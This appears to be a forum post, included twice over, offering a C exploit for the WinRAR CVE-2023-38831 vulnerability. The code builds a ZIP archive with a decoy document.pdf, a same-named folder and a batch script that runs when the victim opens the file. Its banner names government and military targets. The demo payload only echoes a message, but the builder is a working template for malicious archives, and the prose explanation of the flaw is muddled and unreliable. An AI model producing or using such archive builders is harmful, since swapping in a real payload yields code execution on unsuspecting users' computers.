EXPLOIT WinRAR version 6.22 Vulnerability CVE-2023-38831
This code is an example of a security attack on WinRAR software that exploits the vulnerability CVE-2023-38831. This vulnerability allows creating a ZIP file that contains a PDF file and a folder with the same name. When WinRAR opens the ZIP file, it extracts the PDF file to the user's desired path and then creates the folder in the same path. This makes the PDF file appear as a folder to the user and if the user double-clicks on it, WinRAR executes the PDF file instead of opening the folder. This method can be used to execute malicious code on the user's system.
This code creates a ZIP file that contains a PDF file and a folder named document.pdf. In this folder, there is a script file named script.bat that displays a message on the console that the user has been attacked by CVE-2023-38831. If the user opens the ZIP file and double-clicks on document.pdf, WinRAR executes the script file and runs the malicious code on the user's system.
################################################################################################
# Exploit Title : EXPLOIT WinRAR version 6.22 Vulnerability CVE-2023-38831 #
# #
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Security Risk : High #
# #
# Description : All target's GOV & Military websites #
# #
################################################################################################
# #
# Expl0iTs: #
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "zip.h"
#define PDF_FILE "document.pdf"
#define FOLDER_NAME "document.pdf\\"
#define SCRIPT_FILE "script.bat"
#define ZIP_FILE "exploit.zip"
int main(void) {
zipFile zf = zipOpen(ZIP_FILE, APPEND_STATUS_CREATE);
if (zf == NULL) {
printf("Error opening ZIP file\n");
return -1;
}
zip_fileinfo zfi;
memset(&zfi, 0, sizeof(zfi));
if (zipOpenNewFileInZip(zf, PDF_FILE, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {
printf("Error adding PDF file to ZIP file\n");
zipClose(zf, NULL);
return -1;
}
FILE *fp = fopen(PDF_FILE, "rb");
if (fp == NULL) {
printf("Error opening PDF file\n");
zipCloseFileInZip(zf);
zipClose(zf, NULL);
return -1;
}
char buffer[1024];
int bytes_read;
while ((bytes_read = fread(buffer, 1, sizeof(buffer), fp)) > 0) {
if (zipWriteInFileInZip(zf, buffer, bytes_read) < 0) {
printf("Error writing PDF file to ZIP file\n");
fclose(fp);
zipCloseFileInZip(zf);
zipClose(zf, NULL);
return -1;
}
}
fclose(fp);
zipCloseFileInZip(zf);
if (zipOpenNewFileInZip(zf, FOLDER_NAME, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {
printf("Error adding folder to ZIP file\n");
zipClose(zf, NULL);
return -1;
}
zipCloseFileInZip(zf);
char script_name[256];
sprintf(script_name, "%s%s", FOLDER_NAME, SCRIPT_FILE);
if (zipOpenNewFileInZip(zf, script_name, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {
printf("Error adding script file to ZIP file\n");
zipClose(zf, NULL);
return -1;
}
char script_content[] = "@echo off\nstart cmd /c \"echo You have been exploited by CVE-2023-38831 && pause\"\n";
if (zipWriteInFileInZip(zf, script_content, strlen(script_content)) < 0) {
printf("Error writing script file to ZIP file\n");
zipCloseFileInZip(zf);
zipClose(zf, NULL);
return -1;
}
zipCloseFileInZip(zf);
zipClose(zf, NULL);
printf("ZIP file created successfully\n");
return 0;
}
Solution:
To avoid this vulnerability, you should update your WinRAR software to the latest version and avoid opening unknown zip files.
nvd.nist.gov
nvd.nist.gov
github.com
www.logpoint.com
packetstormsecurity.com
blog.google
REFRENCE : https://packetstormsecurity.com/files/177803/WinRAR-6.22-Remote-Code-Execution.html
This code is an example of a security attack on WinRAR software that exploits the vulnerability CVE-2023-38831. This vulnerability allows creating a ZIP file that contains a PDF file and a folder with the same name. When WinRAR opens the ZIP file, it extracts the PDF file to the user's desired path and then creates the folder in the same path. This makes the PDF file appear as a folder to the user and if the user double-clicks on it, WinRAR executes the PDF file instead of opening the folder. This method can be used to execute malicious code on the user's system.
This code creates a ZIP file that contains a PDF file and a folder named document.pdf. In this folder, there is a script file named script.bat that displays a message on the console that the user has been attacked by CVE-2023-38831. If the user opens the ZIP file and double-clicks on document.pdf, WinRAR executes the script file and runs the malicious code on the user's system.
################################################################################################
# Exploit Title : EXPLOIT WinRAR version 6.22 Vulnerability CVE-2023-38831 #
# #
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Security Risk : High #
# #
# Description : All target's GOV & Military websites #
# #
################################################################################################
# #
# Expl0iTs: #
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "zip.h"
#define PDF_FILE "document.pdf"
#define FOLDER_NAME "document.pdf\\"
#define SCRIPT_FILE "script.bat"
#define ZIP_FILE "exploit.zip"
int main(void) {
zipFile zf = zipOpen(ZIP_FILE, APPEND_STATUS_CREATE);
if (zf == NULL) {
printf("Error opening ZIP file\n");
return -1;
}
zip_fileinfo zfi;
memset(&zfi, 0, sizeof(zfi));
if (zipOpenNewFileInZip(zf, PDF_FILE, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {
printf("Error adding PDF file to ZIP file\n");
zipClose(zf, NULL);
return -1;
}
FILE *fp = fopen(PDF_FILE, "rb");
if (fp == NULL) {
printf("Error opening PDF file\n");
zipCloseFileInZip(zf);
zipClose(zf, NULL);
return -1;
}
char buffer[1024];
int bytes_read;
while ((bytes_read = fread(buffer, 1, sizeof(buffer), fp)) > 0) {
if (zipWriteInFileInZip(zf, buffer, bytes_read) < 0) {
printf("Error writing PDF file to ZIP file\n");
fclose(fp);
zipCloseFileInZip(zf);
zipClose(zf, NULL);
return -1;
}
}
fclose(fp);
zipCloseFileInZip(zf);
if (zipOpenNewFileInZip(zf, FOLDER_NAME, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {
printf("Error adding folder to ZIP file\n");
zipClose(zf, NULL);
return -1;
}
zipCloseFileInZip(zf);
char script_name[256];
sprintf(script_name, "%s%s", FOLDER_NAME, SCRIPT_FILE);
if (zipOpenNewFileInZip(zf, script_name, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {
printf("Error adding script file to ZIP file\n");
zipClose(zf, NULL);
return -1;
}
char script_content[] = "@echo off\nstart cmd /c \"echo You have been exploited by CVE-2023-38831 && pause\"\n";
if (zipWriteInFileInZip(zf, script_content, strlen(script_content)) < 0) {
printf("Error writing script file to ZIP file\n");
zipCloseFileInZip(zf);
zipClose(zf, NULL);
return -1;
}
zipCloseFileInZip(zf);
zipClose(zf, NULL);
printf("ZIP file created successfully\n");
return 0;
}
Solution:
To avoid this vulnerability, you should update your WinRAR software to the latest version and avoid opening unknown zip files.
NVD - CVE-2023-38831
nvd.nist.gov
NVD - CVE-2023-38831
nvd.nist.gov
GitHub - HDCE-inc/CVE-2023-38831: CVE-2023-38831 PoC (Proof Of Concept)
CVE-2023-38831 PoC (Proof Of Concept). Contribute to HDCE-inc/CVE-2023-38831 development by creating an account on GitHub.
github.com
CVE-2023-38831 : RARLAB WinRAR before 6.23 allows attackers to execute arbitrary code when a user
CVE-2023-38831 : RARLAB WinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive. The issue occurs
www.cvedetails.com
CVE-2023-38831: WinRAR - Decompression or Arbitrary Code Execution
Discover more about vulnerability CVE-2023-38831. Do you use WinRAR for ZIP files? If so you could be vulnerable. Read more.
www.logpoint.com
WinRAR Remote Code Execution ≈ Packet Storm
Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers
Government-backed actors exploiting WinRAR vulnerability
Google's Threat Analysis Group analyzes recent state-sponsored campaigns exploiting the WinRAR vulnerability, CVE-2023-38831.
REFRENCE : https://packetstormsecurity.com/files/177803/WinRAR-6.22-Remote-Code-Execution.html
Last edited:
![[DK]](/data/avatars/s/57/57999.jpg?1720990206){kind=avatar}
